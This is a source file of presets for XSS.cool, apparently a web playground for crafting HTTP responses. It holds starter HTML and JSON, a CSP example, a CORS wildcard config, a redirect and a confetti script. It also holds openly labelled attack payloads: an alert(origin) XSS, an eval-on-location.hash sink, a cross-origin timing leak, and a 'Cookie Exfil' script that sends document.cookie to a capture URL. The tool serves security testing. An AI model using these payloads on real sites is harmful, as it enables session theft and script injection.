export const DEFAULT_HTML = `<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8" />
    <title>XSS.cool</title>
  </head>
  <body>
    <h1>hello from XSS.cool</h1>
    <p>Craft HTTP responses without setting up a server.</p>
  </body>
</html>
`;
const ALERT_ORIGIN_HTML = `<script>alert(origin)</script>
`;
const CSP_INLINE_BLOCK_HTML = `<script>alert('blocked?')</script>
<p>Inline scripts are blocked by CSP.</p>
`;
const REDIRECT_302_HTML = `<p>You should be redirected instantly.</p>
`;
const JSON_API = `{
  "ok": true,
  "message": "hello from xss.cool",
  "payloads": [
    { "name": "html", "available": true },
    { "name": "json", "available": true }
  ]
}
`;
const CORS_OPEN = `{
  "message": "CORS playground",
  "ok": true
}
`;
const CONFETTI_JS = `const s = document.createElement('script');
s.src = 'https://cdn.jsdelivr.net/npm/canvas-confetti/dist/confetti.browser.min.js';
s.onload = () => {
  const colors = ['#ff6b6b','#ffd93d','#6cf','#7fd','#c084fc','#fb923c','#f472b6'];
  const hint = document.createElement('div');
  hint.textContent = '🎉 click anywhere for confetti';
  hint.style.cssText = 'position:fixed;inset:0;display:grid;place-items:center;font:600 24px system-ui,sans-serif;color:#888;pointer-events:none;user-select:none;-webkit-user-select:none';
  document.body.appendChild(hint);
  document.addEventListener('click', (e) => {
    const origin = { x: e.clientX / innerWidth, y: e.clientY / innerHeight };
    confetti({ particleCount: 180, spread: 90, startVelocity: 50, ticks: 220, origin, colors, shapes: ['square','circle'], scalar: 1.1 });
    setTimeout(() => confetti({ particleCount: 100, spread: 140, startVelocity: 25, ticks: 280, origin, colors, scalar: 0.7, gravity: 0.8 }), 120);
    setTimeout(() => confetti({ particleCount: 30, angle: 90, spread: 60, startVelocity: 35, ticks: 360, origin, colors, scalar: 1.4, gravity: 0.4 }), 240);
  });
};
document.head.appendChild(s);
`;
const COOKIE_EXFIL_JS = `// Replace the /c/REPLACE-ME URL below with a real capture URL using the
// "Insert capture URL" button in the body-editor toolbar: incoming requests
// (cookie included) will appear live in the Captures tab.
fetch('https://xss.cool/c/REPLACE-ME?cookie=' + encodeURIComponent(document.cookie), {
  mode: 'no-cors',
});
`;
const HASH_EVAL_JS = `eval(decodeURIComponent(location.hash.slice(1)))
`;
const WINDOW_OPEN_JS = `const waitUntilCrossOrigin = async (win, pollMs = 5) => {
  const start = performance.now();

  return new Promise((resolve) => {
    const i = setInterval(() => {
      try {
        win.origin;
      } catch {
        clearInterval(i);
        resolve(performance.now() - start);
      }
    }, pollMs);
  });
};

const run = async () => {
  if (opener == null) {
    window.open(location.href, '_blank');
    location = 'about:blank';
    return;
  }

  opener.location = 'https://xss.cool?delay=1000';
  const t = await waitUntilCrossOrigin(opener);
  document.body.innerHTML = t;
};

run();
`;
export const PAYLOADS = [
    {
        id: 'reset',
        title: 'HTML Starter',
        description: 'Restore the starter HTML payload and clear extras.',
        tags: ['starter', 'html'],
        preset: {
            status: 200,
            payloadParam: 'html',
            editorLanguage: 'html',
            editorContent: DEFAULT_HTML,
            headers: [],
            delay: 0,
        },
    },
    {
        id: 'json-api',
        title: 'JSON API',
        description: 'application/json payload with sample data.',
        tags: ['starter', 'json', 'api'],
        preset: {
            status: 200,
            payloadParam: 'json',
            editorLanguage: 'json',
            editorContent: JSON_API,
            headers: [{ name: 'Cache-Control', value: 'no-cache' }],
            delay: 0,
        },
    },
    {
        id: 'csp-inline-block',
        title: 'CSP: block inline',
        description: 'Adds a CSP that blocks inline script execution.',
        tags: ['csp', 'defense', 'headers'],
        preset: {
            status: 200,
            payloadParam: 'html',
            editorLanguage: 'html',
            editorContent: CSP_INLINE_BLOCK_HTML,
            headers: [
                {
                    name: 'Content-Security-Policy',
                    value: "default-src 'self'; script-src 'self'; object-src 'none'; frame-ancestors 'none'",
                },
            ],
            delay: 0,
        },
    },
    {
        id: 'cors-open',
        title: 'CORS: wildcard',
        description: 'Allow any origin and expose a custom header.',
        tags: ['cors', 'headers', 'cross-origin'],
        preset: {
            status: 200,
            payloadParam: 'json',
            editorLanguage: 'json',
            editorContent: CORS_OPEN,
            headers: [
                { name: 'Access-Control-Allow-Origin', value: '*' },
                { name: 'Access-Control-Allow-Headers', value: 'Authorization' },
                { name: 'Access-Control-Allow-Methods', value: 'GET,POST,PUT,PATCH,DELETE,OPTIONS' },
                { name: 'Access-Control-Expose-Headers', value: 'X-Debug' },
                { name: 'Access-Control-Max-Age', value: '600' },
            ],
            delay: 0,
        },
    },
    {
        id: 'redirect-302',
        title: '302 Redirect',
        description: 'Sends a 302 redirect to example.com.',
        tags: ['redirect', 'status'],
        preset: {
            status: 302,
            payloadParam: 'html',
            editorLanguage: 'html',
            editorContent: REDIRECT_302_HTML,
            headers: [
                { name: 'Cache-Control', value: 'no-store' },
                { name: 'Location', value: 'https://example.com' },
            ],
            delay: 0,
        },
    },
    {
        id: 'alert-origin',
        title: 'XSS Alert Origin',
        description: 'Inline script that alerts the current origin.',
        tags: ['xss', 'starter'],
        preset: {
            status: 200,
            payloadParam: 'html',
            editorLanguage: 'html',
            editorContent: ALERT_ORIGIN_HTML,
            headers: [],
            delay: 0,
        },
    },
    {
        id: 'hash-eval',
        title: 'Hash Eval',
        description: 'eval(decodeURIComponent(location.hash.slice(1)))',
        tags: ['xss', 'sink'],
        preset: {
            status: 200,
            payloadParam: 'script',
            editorLanguage: 'javascript',
            editorContent: HASH_EVAL_JS,
            headers: [],
            delay: 0,
        },
    },
    {
        id: 'cookie-exfil',
        title: 'Cookie Exfil',
        description: 'fetch document.cookie to an xss.cool capture URL (replace via toolbar).',
        tags: ['xss', 'exfil', 'capture'],
        preset: {
            status: 200,
            payloadParam: 'script',
            editorLanguage: 'javascript',
            editorContent: COOKIE_EXFIL_JS,
            headers: [],
            delay: 0,
        },
    },
    {
        id: 'confetti',
        title: 'Confetti',
        description: 'Click anywhere to fire confetti at the cursor.',
        tags: ['fun'],
        preset: {
            status: 200,
            payloadParam: 'script',
            editorLanguage: 'javascript',
            editorContent: CONFETTI_JS,
            headers: [],
            delay: 0,
        },
    },
    {
        id: 'window-open',
        title: 'Window Open',
        description: "Open a window and wait until it's cross-origin.",
        tags: ['xs-leak', 'cross-origin', 'timing'],
        preset: {
            status: 200,
            payloadParam: 'script',
            editorLanguage: 'javascript',
            editorContent: WINDOW_OPEN_JS,
            headers: [],
            delay: 0,
        },
    },
];
export function defaultEditorState() {
    return {
        status: 200,
        delay: 0,
        payloadParam: 'html',
        editorLanguage: 'html',
        editorContent: DEFAULT_HTML,
        headers: [],
        chunks: 1,
        chunkDelay: 0,
    };
}
